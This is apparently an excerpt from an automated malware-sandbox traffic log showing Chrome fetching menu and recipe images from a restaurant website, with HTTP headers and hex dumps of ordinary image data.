                                                                                                                                                    Data Ascii: ExifMM*@(1"2i$''Adobe Photoshop CC 2015 (Windows)2023:09:27 19:03:07
                                                                                                                                                    2024-10-01 04:26:57 UTC16384INData Raw: 3b 26 09 bc 66 b4 7b 14 ed c7 45 2d 1c fb 15 84 44 60 02 76 7a cd 32 74 d2 64 03 b2 28 d4 ea 00 f9 f8 ef bd d3 70 7d 76 7c dd 46 d6 0e b1 c7 ab 1a 6b 5c ec 46 ad 89 77 df 38 8d 58 8d 6b 09 94 a1 36 d9 a2 56 b5 49 99 46 69 e3 31 c8 8c 23 54 b5 0b dc fe f1 e3 1b 7c f4 79 bd f5 21 19 ad 1c 9d 7c 8c dc 11 16 b9 0e 33 83 87 76 42 94 46 51 3a 64 b4 74 c8 12 48 14 a3 20 53 1c d5 8a ed 2b 6a c4 a6 11 1e bd ba c5 45 25 58 bb 27 06 78 a6 a4 32 08 8b e8 16 f2 e9 7e 83 92 bd 19 fa 16 9f 39 b1 87 16 cb 45 f7 cd d9 af b5 5a ec 90 02 62 41 2b 35 ed 5c 18 b5 25 ac 9e 30 78 25 08 c2 59 8e 12 5c 3f 07 da f9 4e 9a 72 9b 9c dc 71 f6 18 83 28 ed e6 ba 31 8a 75 44 24 9d a6 49 26 d2 69 0a 2d 24 34 ce c0 9d 90 9d d9 14 c4 11 02 16 2a 94 2c 53 b9 52 75 b9 5a cd 65 71 74 af 9d 3b
                                                                                                                                                    Data Ascii: ;&f{E-D`vz2td(p}v|Fk\Fw8Xk6VIFi1#T|y!|3vBFQ:dtH S+jE%X'x2~9EZbA+5\%0x%Y\?Nrq(1uD$I&i-$4*,SRuZeqt;
                                                                                                                                                    2024-10-01 04:26:57 UTC16384INData Raw: e4 98 98 f4 2b e6 f7 21 99 99 a1 fb 85 61 03 1f 4d 53 c6 5c dc 8a 8f c1 7c 25 47 f3 6f f2 31 fe e6 1f 0a e8 ca 3d e8 8b fd 07 6c cd 47 ca e7 d3 1e 8f 53 33 1d 60 07 83 16 b0 65 dc aa 95 3f b8 3f c2 a7 1c a5 87 88 6f f1 d7 f2 d6 08 25 92 cb 14 47 bc b2 b9 e4 70 b3 fb 7d 4f 60 80 e2 6b 5a 12 7e cd 70 5f 59 0a ca f0 8c 43 36 4e 12 57 f7 b9 03 29 1e cb d6 e6 c1 c4 00 63 fd b5 06 5a e1 f8 d8 18 46 31 b1 92 72 46 09 c4 23 13 33 94 c8 84 88 d6 a8 85 c9 f4 12 a3 ea 3c 4a ae 36 09 b4 d9 f4 4f bb 1e 53 6a ac ad 4d c8 02 66 41 8e 66 a1 8c 72 0f da da bc 58 0a 92 40 83 ef ee 2c 3e 0b 42 c4 46 76 85 89 f5 10 c4 f1 3e e3 d6 87 36 0b 9b 93 c1 e2 29 c8 65 cc b6 92 ae 2c 78 8c c4 8a 8d a2 b5 6a d9 ad 10 e3 16 1c 2b 91 6c b6 bc 1f 13 84 63 c8 98 c2 30 98 fa 00 82 2f da 11
                                                                                                                                                    Data Ascii: +!aMS\|%Go1=lGS3`e??o%Gp}O`kZ~p_YC6NW)cZF1rF#3<J6OSjMfAfrX@,>BFv>6)e,xj+lc0/
                                                                                                                                                    2024-10-01 04:26:57 UTC15252INData Raw: 39 47 e9 1c 97 ea 76 50 db af b1 5c 2f c4 a6 c5 4e 34 3a 41 63 1f c6 63 13 73 64 58 7c 05 d2 42 a9 f4 5a c1 13 57 77 fd 8e d2 e4 47 5f 3a e7 f1 d8 b9 16 2a 82 39 8c 2a 80 1c 04 34 a9 61 c4 99 93 96 c8 8c 42 a9 2a 4b 55 75 b0 75 bb 36 13 d0 6d 93 5f c6 f7 89 3f 19 dc 69 ff 00 58 dd 31 be 31 b4 f1 fe 2f b6 d3 fe a1 b2 63 7c 2f 69 a1 f8 96 d6 2c f8 3e e3 bf fd 27 7a 2f c2 77 f3 5f c3 76 d0 ff 00 d5 37 63 fc 43 6d 96 af 86 ed a8 ff 00 a9 ed 10 7e 29 b3 0f c4 76 5a 7f d3 76 48 1f 0d d9 13 fe a1 b5 86 f8 56 d1 8b f0 9d 89 5f c2 ed 58 7e 21 69 96 7c 18 b9 1f 02 cc 4f 86 28 9f f4 f5 9e f2 45 b5 96 7e ed eb 17 b3 b8 4a 7b 15 69 ef 03 39 09 b9 b9 88 8a 73 52 9b 1d 00 03 d4 cf 9d 76 5f eb fa 9e bb 50 eb eb bf 25 29 63 b8 b9 4f 1a 4e 59 4f 9b 2e 5a 05 3d 8a 58 09 0d
                                                                                                                                                    Data Ascii: 9GvP\/N4:AccsdX|BZWwG_:*9*4aB*KUuu6m_?iX11/c|/i,>'z/w_v7cCm~)vZvHV_X~!i|O(E~J{i9sRv_P%)cONYO.Z=X
                                                                                                                                                    2024-10-01 04:26:57 UTC16384INData Raw: 1e 44 48 0a af e2 b0 58 2e f2 5c 10 52 b7 02 e0 1c 55 76 39 77 18 32 d3 38 49 f7 b2 1a 9f cc b8 b0 54 4e 02 e9 09 b6 03 e0 ca d8 97 cd 9d 00 46 57 03 93 52 ad 73 51 98 90 ba d4 07 a3 60 42 76 80 76 c1 34 a8 7c 07 d9 8a a1 55 c5 55 62 cb 1a 2a 60 ab 82 61 b1 93 11 e5 5a a4 57 19 55 0e 13 98 85 48 05 5b 71 5a c4 40 7c 95 60 0a 61 00 dd 4a b0 1e 65 d8 1e 65 f7 71 f3 2f ba 8f 99 7d d4 7c cb ee e3 e6 5f 77 1f 30 55 b7 0f 32 e1 b5 0f 30 4e 6d c7 cc 8b 5b 8b f5 2f bb 8f 99 30 00 0e a4 fa 22 7c 8b b1 16 ea 4f a2 3e 65 48 c7 cc 13 68 8b 75 2a 40 7d 0b 01 e6 54 01 fa 93 64 15 13 ac 56 2a 92 1f da a9 25 da 55 93 2d 5c cc 63 39 0d e1 39 b5 6e bd 01 69 9d a8 4a 22 80 10 8b 58 b6 3a 74 85 a7 b9 b6 db c0 01 30 83 75 27 b9 6c 1e b4 4d db 5c 49 e5 6a 9d 69 cd 9a f5 94 e6
                                                                                                                                                    Data Ascii: DHX.\RUv9w28ITNFWRsQ`Bvv4|UUb*`aZWUH[qZ@|`aJeeq/}|_w0U20Nm[/0"|O>eHhu*@}TdV*%U-\c99niJ"X:t0u'lM\Iji
                                                                                                                                                    2024-10-01 04:26:57 UTC11685INData Raw: d2 d5 71 81 27 88 0c cf ae 8e 9b 64 c9 e8 4f 6b e0 5a 81 d3 83 b9 44 76 ae 93 b9 39 22 59 16 0c a2 4e b8 e4 00 3a 99 7c ab a6 b2 c4 76 be 24 35 48 9e 92 9e 35 e8 42 42 a5 b0 64 c6 b2 67 29 88 06 98 ee 4f 14 2e 33 f5 05 7e e9 76 84 61 01 f6 e5 e2 c9 41 8b 16 46 12 ab 86 5f 2f b2 c8 cc 0e d9 7d b4 5c 2c fd 28 6a c7 36 55 5d dc 2a 73 e8 52 d2 5c c4 6f df c0 be 84 60 68 08 64 2d 39 2d 9a 35 ff 00 c5 08 ca 44 dc 7c 32 08 82 38 46 06 ab ca a4 34 b2 2e a2 c5 8e 1f 42 7b ce 6c d9 20 01 be 5e d2 e1 0c 05 13 08 d1 64 0a ae 39 a3 72 45 a0 ec 81 22 44 37 50 4c 0e 9b 62 9a 19 d1 d4 75 41 d8 53 b2 9e 25 fa 33 5d 9f 6b ca 9a 72 e1 11 60 00 5a 83 3b 50 94 5c 03 e4 55 24 83 88 e8 44 c5 e7 6c 9a 48 9f f4 e4 b8 58 05 26 30 0e fd a4 7b c9 c7 41 0c 34 56 a9 e1 de 48 c7 84 bd
                                                                                                                                                    Data Ascii: q'dOkZDv9"YN:|v$5H5BBdg)O.3~vaAF_/}\,(j6U]*sR\o`hd-9-5D|28F4.B{l ^d9rE"D7PLbuAS%3]kr`Z;P\U$DlHX&0{A4VH


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    135192.168.2.449902162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:57 UTC385OUTGET /assets/imgs/food_menu_tea.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:57 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:57 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:50 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 25627
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:57 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:57 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 2d 08 06 00 00 00 0a 96 f3 bb 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 56 e1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR7-pHYsViTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:57 UTC9595INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    136192.168.2.449903162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:57 UTC384OUTGET /assets/imgs/img_recipe_5.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:57 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:57 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Thu, 05 Oct 2023 21:10:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 188613
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:57 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:57 UTC16030INData Raw: ff d8 ff e1 1b 4f 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: OExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:57 UTC5499INData Raw: 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 30 36 39 38 32 34 66 37 2d 36 33 37 34 2d 31 31 65 65 2d 38 38 39 62 2d 39 65 31 64 38 34 61 34 36 32 34 66 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 66 65 36 31 63 37 35 66 2d 34 33 32 61 2d 64 63 34 66 2d 38 35 31 63 2d 35 66 66 38 39 65 61 32 64 37 61 30 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 46 35 43 43 32 39 43 35 36 42 37 32 46 46 46 34 38 30 46 46 34 30 38 39 45 32 31 36 35 45 44 35 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 6a 70 65 67 22 3e 20 3c 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 20 3c 72 64 66 3a 53 65 71 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69
                                                                                                                                                    Data Ascii: D="adobe:docid:photoshop:069824f7-6374-11ee-889b-9e1d84a4624f" xmpMM:InstanceID="xmp.iid:fe61c75f-432a-dc4f-851c-5ff89ea2d7a0" xmpMM:OriginalDocumentID="F5CC29C56B72FFF480FF4089E2165ED5" dc:format="image/jpeg"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:acti
                                                                                                                                                    2024-10-01 04:26:57 UTC16384INData Raw: 91 a8 92 11 92 7a 92 e3 93 4d 93 b6 94 20 94 8a 94 f4 95 5f 95 c9 96 34 96 9f 97 0a 97 75 97 e0 98 4c 98 b8 99 24 99 90 99 fc 9a 68 9a d5 9b 42 9b af 9c 1c 9c 89 9c f7 9d 64 9d d2 9e 40 9e ae 9f 1d 9f 8b 9f fa a0 69 a0 d8 a1 47 a1 b6 a2 26 a2 96 a3 06 a3 76 a3 e6 a4 56 a4 c7 a5 38 a5 a9 a6 1a a6 8b a6 fd a7 6e a7 e0 a8 52 a8 c4 a9 37 a9 a9 aa 1c aa 8f ab 02 ab 75 ab e9 ac 5c ac d0 ad 44 ad b8 ae 2d ae a1 af 16 af 8b b0 00 b0 75 b0 ea b1 60 b1 d6 b2 4b b2 c2 b3 38 b3 ae b4 25 b4 9c b5 13 b5 8a b6 01 b6 79 b6 f0 b7 68 b7 e0 b8 59 b8 d1 b9 4a b9 c2 ba 3b ba b5 bb 2e bb a7 bc 21 bc 9b bd 15 bd 8f be 0a be 84 be ff bf 7a bf f5 c0 70 c0 ec c1 67 c1 e3 c2 5f c2 db c3 58 c3 d4 c4 51 c4 ce c5 4b c5 c8 c6 46 c6 c3 c7 41 c7 bf c8 3d c8 bc c9 3a c9 b9 ca 38 ca b7 cb
                                                                                                                                                    Data Ascii: zM _4uL$hBd@iG&vV8nR7u\D-u`K8%yhYJ;.!zpg_XQKFA=:8
                                                                                                                                                    2024-10-01 04:26:57 UTC16384INData Raw: 2b c5 d9 b4 b3 d0 d7 31 2b b8 fa 85 cb 00 26 06 5a 99 d8 87 7d 25 44 d7 9b a5 24 65 af 35 ed 27 22 6b 57 6c c4 e5 54 d7 a4 a0 e9 49 61 89 cf d2 3a be 7f 99 3a d2 74 e6 fe 4e 3e 2d 96 91 aa e1 36 f5 51 a8 52 ab 52 76 a5 4e 5d 46 d6 7c 4b 55 e3 6a f7 b3 1c 87 01 f4 ef 3b 8b 0b ab 4e 2f 5b fa 06 38 6f 72 61 a0 b1 e0 f4 e8 e1 fb 7a 31 fa 3b 3e f3 cb e7 b6 d7 ce f8 fe 89 ee 6e 8d 4c ef 6e 1e 98 a9 73 9a ad 51 a7 40 00 cc 28 db c4 6a 4d 8e 8c 0d be 59 d6 ef 0f d2 ab 71 8b b4 f1 dd 3c bd 85 f9 d9 52 f9 e3 ad 4e 5f 70 99 6c fc 5f 47 ce fa 27 8e ca cd 8d d6 6e 5b 27 9e 9d b6 7c 86 d2 07 4b 25 68 05 69 e1 6c eb 98 53 08 db e8 c5 18 a4 26 96 18 a9 13 4c 91 9a 52 8a d4 d1 8b 35 e4 c2 9e c6 bc 9d e7 47 8f 8c 8e 3d ac b7 17 1a 76 e3 4d 79 0e 8a cf 6b aa e7 98 b7 81 7d
                                                                                                                                                    Data Ascii: +1+&Z}%D$e5'"kWlTIa::tN>-6QRRvN]F|KUj;N/[8oraz1;>nLnsQ@(jMYq<RN_pl_G'n['|K%hilS&LR5G=vMyk}
                                                                                                                                                    2024-10-01 04:26:57 UTC16384INData Raw: b6 a0 94 91 ca fc c2 04 30 9c c3 30 70 23 da a0 3d 99 88 20 70 4e 66 46 15 22 c1 99 88 d0 b4 06 05 cc 76 00 24 e3 01 50 32 21 84 ce 43 c6 4e 10 fa 07 c6 3d 99 c6 71 26 26 b4 0a 3c 18 ae 44 2f 92 de e7 01 31 02 c0 20 48 14 08 c3 df 81 04 06 08 0f b0 80 13 fa 07 12 c3 92 63 34 63 39 44 99 c4 c8 c8 f5 33 eb f7 16 12 0c 33 dc c4 e3 31 85 2a 49 5a 18 c6 a9 94 53 49 32 cd 62 ab 53 04 96 fb 11 cf 82 0c e4 4c 36 fa 6f 64 e4 c4 a8 95 35 ff 00 90 18 84 62 57 8c 91 3e 59 c8 43 ee 66 66 73 85 b3 10 c0 d9 8e d9 3c a2 b6 61 f7 00 f7 8f 5c 04 2b 85 fd 4c c1 31 02 40 00 86 62 01 38 ce 27 00 62 62 01 05 26 14 c4 02 0a b2 13 dc 2b 31 38 40 31 e0 11 99 fb 07 2b 0b 7a 63 0c b5 a1 84 18 04 27 88 2c 60 38 8a 22 e2 57 51 62 e0 ac 41 93 69 c1 03 27 8c 66 81 3d 0a 84 51 04 70 42
                                                                                                                                                    Data Ascii: 00p#= pNfF"v$P2!CN=q&&<D/1 Hc4c9D331*IZSI2bSL6od5bW>YCffs<a\+L1@b8'bb&+18@1+zc',`8"WQbAi'f=QpB
                                                                                                                                                    2024-10-01 04:26:57 UTC16331INData Raw: 11 99 c0 80 33 f8 1a c1 86 a8 53 1f 8f 11 38 c2 0f 8c c7 33 33 33 3e 07 e1 fa 09 fa 61 0f 83 ef c0 82 01 31 31 00 c7 83 ee 64 08 3d c1 51 31 6b 03 ce 7f 05 fd af eb 33 76 e2 ed a7 b2 6a 65 7c 86 79 cb 07 39 f2 7c 05 98 f2 07 80 20 84 41 81 1c e2 2c 2f 86 2c 01 60 33 6b 9c d4 c4 85 19 86 2f a9 8f 65 40 2c f1 06 7f 32 01 86 a1 0d 64 4c 7e 0c 31 33 1e 67 c1 fc bf e0 18 4c ce 3c 62 62 01 31 31 31 01 82 1f 71 db 02 b4 2d 39 02 40 fe 00 65 47 2a 01 33 63 53 25 d2 69 5e 20 84 4c 4e 33 8c e1 02 8f 18 9c 60 58 7d 90 b1 4f bc 42 a2 2f a8 c0 90 be a5 6b 99 60 00 8e 24 95 06 10 00 10 0f 51 ff 00 64 62 15 02 2a e0 78 c4 3e a7 ca b3 98 fc 31 08 11 94 42 21 f2 56 62 11 31 31 31 31 31 e4 cc 4c 79 1e 5a 2f b9 ce 17 98 9c 89 88 b8 1f 90 f3 aa e4 f9 db 50 19 0e 18 7b 18 f1
                                                                                                                                                    Data Ascii: 3S8333>a11d=Q1k3vje|y9| A,/,`3k/e@,2dL~13gL<bb111q-9@eG*3cS%i^ LN3`X}OB/k`$Qdb*x>1B!Vb11111LyZ/P{
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 57 63 6a fa 3a d1 b2 e6 b4 40 d4 68 a5 b6 d9 5e bf 5f aa 59 96 d9 d7 d6 ce 35 b5 8f c2 b4 ea 8a d5 17 25 aa 0e 6f e6 75 9d 2c 63 aa e0 ed 06 0b b9 5e b1 6e cb eb 9a 77 59 55 7a b4 53 6d ed 65 5b 57 2d 75 77 2b 6d 83 eb 7b 42 db 3b 1e d7 5f 5c 7d e2 fa 68 ea 1f b5 e4 9d 55 9b 3f dd fa f5 3b 7d 87 5f 5e b8 49 db f4 1a 1b f7 6e ff 00 a9 fa 89 b9 d5 1d 3d 9d af ae db bb 65 5f 53 fb 0e a5 7d 6e af 65 50 ec 2c 5a b5 89 33 94 e5 88 1b dd 24 99 49 55 aa c7 1c b6 9c 18 5a 6c 37 bd d5 cb 8a c6 4d 63 26 90 09 44 00 83 9b 18 c0 e7 2c ec 42 96 06 87 31 2b e4 06 90 76 e9 7e 83 da f6 96 fd 6b fd 3f a3 40 eb be af d7 ea 22 ea d1 58 62 a2 17 c4 f9 46 7e 61 0d be cd de 8d ad 39 31 80 39 22 b2 42 d3 35 ef b6 b1 ac 9d 8e e1 ab ea aa 66 e7 4d ab ae ae aa 08 02 0c 40 60 9d ff
                                                                                                                                                    Data Ascii: Wcj:@h^_Y5%ou,c^nwYUzSme[W-uw+m{B;_\}hU?;}_^In=e_S}neP,Z3$IUZl7Mc&D,B1+v~k?@"XbF~a919"B5fM@`
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: bc cd 6d fa d5 32 25 37 a5 94 e8 5a 43 d5 b0 aa 5b b2 02 dd dd 9b 08 b6 e1 95 0a d1 2e ae 99 5d 21 75 ad 08 eb d2 75 f7 df 47 63 da 7f f4 5e 85 a9 6b ad 95 ab bc 33 db a5 c2 9a f5 17 7c 3e c2 b2 8e af 6a 9f e8 ee 6a 81 a7 dd f0 e3 fd fd d3 55 b5 ed 57 ab 4f 6f 7d 92 be d5 dd ff 00 bc 6d 8d 62 5e 57 5e ba ad d3 ad 0b 75 bb 3a e9 5d 3d 6f 67 b1 79 87 11 d4 10 d4 36 4e b0 c5 94 b2 c4 46 8c 61 c6 21 22 12 44 26 31 f6 61 3e b6 5c 31 35 21 9f d6 a8 8b 75 29 2b 6e 9d 58 bf 51 01 b5 14 4f a2 75 b7 6c 76 21 dc d3 ab d3 b3 cb b8 25 5b fa 57 39 fb 97 d4 7b be c3 56 8f a5 76 d6 5c ff 00 5c ec 40 7f ad f7 b6 1e b3 e8 76 93 76 b5 54 53 fd 42 ce 35 a9 a2 ae e3 b3 be e1 d3 74 ba dd 56 b5 e5 4c bf 18 d9 b1 41 bd b9 4d bb e8 d7 9a f7 53 b1 5d 95 a8 97 d6 58 5d d6 56 ac 74
                                                                                                                                                    Data Ascii: m2%7ZC[.]!uuGc^k3|>jjUWOo}mb^W^u:]=ogy6NFa!"D&1a>\15!u)+nXQOulv!%[W9{Vv\\@vvTSB5tVLAMS]X]Vt
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 1b a0 7f 80 1e 2b b7 e0 85 10 ad 0a a7 f2 ca 97 4c 6f af 04 38 72 4f 65 db 74 3e 7e c7 e3 c1 14 5d 0a 54 a0 53 8b ae 6a f4 e1 6f 67 00 ad dc 86 a9 f8 54 05 40 9d ae 7e 68 d3 bb b5 39 0c 55 07 6b 23 c7 8a 6b f6 a6 6b 27 3f 72 e1 cd 5b d8 fc ad c9 7c d3 e9 aa 0f 54 4f 15 66 56 a7 05 67 57 ef 57 6d 15 0d 4d 8a bd 95 fb 55 cf 24 4d 34 57 a6 84 71 4c e5 04 03 d4 05 7a dc a1 5e d4 01 b8 6e ce 6a a5 85 9d d7 9b b7 8f 25 e6 76 e6 be f4 e0 d7 9a fe 6a 8b 96 07 42 98 f6 a7 07 b3 92 63 2f e6 c9 df b9 39 ee 40 6b a0 74 2b dc 98 a7 f7 9d 51 0f 4e 7a 72 41 3d 4c 90 d1 f5 09 d8 d7 de 8b 8e ce f4 6f cd 0a 20 eb b2 c8 51 f9 2b ae df 60 1e f2 ac c3 82 21 bd 9a 90 13 f7 12 b9 a0 7d ca dc 15 d9 ed ec a9 ee 4e ee 98 50 23 5a 32 04 55 ae 55 c7 62 e7 75 4b 20 5f fc 97 d9 a2 e4
                                                                                                                                                    Data Ascii: +Lo8rOet>~]TSjogT@~h9Uk#kk'?r[|TOfVgWWmMU$M4WqLz^nj%vjBc/9@kt+QNzrA=Lo Q+`!}NP#Z2UUbuK _
                                                                                                                                                    2024-10-01 04:26:58 UTC16331INData Raw: a6 2e 4d 98 55 fb d4 b0 10 1b 17 98 99 13 2d 9c c1 52 e9 f2 91 e8 01 be 6f 11 22 68 d4 7e 08 9c 60 ce 18 c6 d8 0b 92 f4 f7 a3 5f fc 89 c4 8a 0a 47 b3 8a 8c 71 63 11 22 5e 2c a0 6e 9b 11 51 d8 bd 48 f4 fb fa 60 c3 36 67 d8 47 f5 08 a8 66 c3 b0 46 35 33 89 77 7f f3 44 02 62 0f 9a 23 ef 51 84 72 11 b6 5b bc 37 23 50 5d 0d 91 32 c7 52 45 8b f6 f3 47 aa 9c 7d 3c d3 88 12 80 34 98 14 14 d4 8f c5 e6 43 26 53 48 bd 09 b7 12 cb 1c 7a 50 33 cc 4c 9c 42 3e 62 1a 83 6e b3 44 fe 9e 7b e3 e6 00 55 18 e5 84 b1 e4 c7 17 30 3c 1d 9c 8d 14 64 6c 43 8e c4 4c a3 60 6b c8 a8 8a 6c ea 5e 31 17 66 d4 a3 d3 e7 db 19 80 d0 2e c2 44 d8 13 cd 61 8c 9f 10 80 10 cd 8c 12 64 0c 4b 14 30 f4 73 ca 0e 29 6e c7 98 90 36 9b 92 0c 6e b3 1c 85 c4 c8 3f d4 68 0b f7 a0 70 92 18 b8 1a 8e f4 24
                                                                                                                                                    Data Ascii: .MU-Ro"h~`_Gqc"^,nQH`6gGfF53wDb#Qr[7#P]2REG}<4C&SHzP3LB>bnD{U0<dlCL`kl^1f.DadK0s)n6n?hp$


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    137192.168.2.449905162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:57 UTC384OUTGET /assets/imgs/img_recipe_8.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:57 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:57 GMT
                                                                                                                                                    content-type: image/jpeg
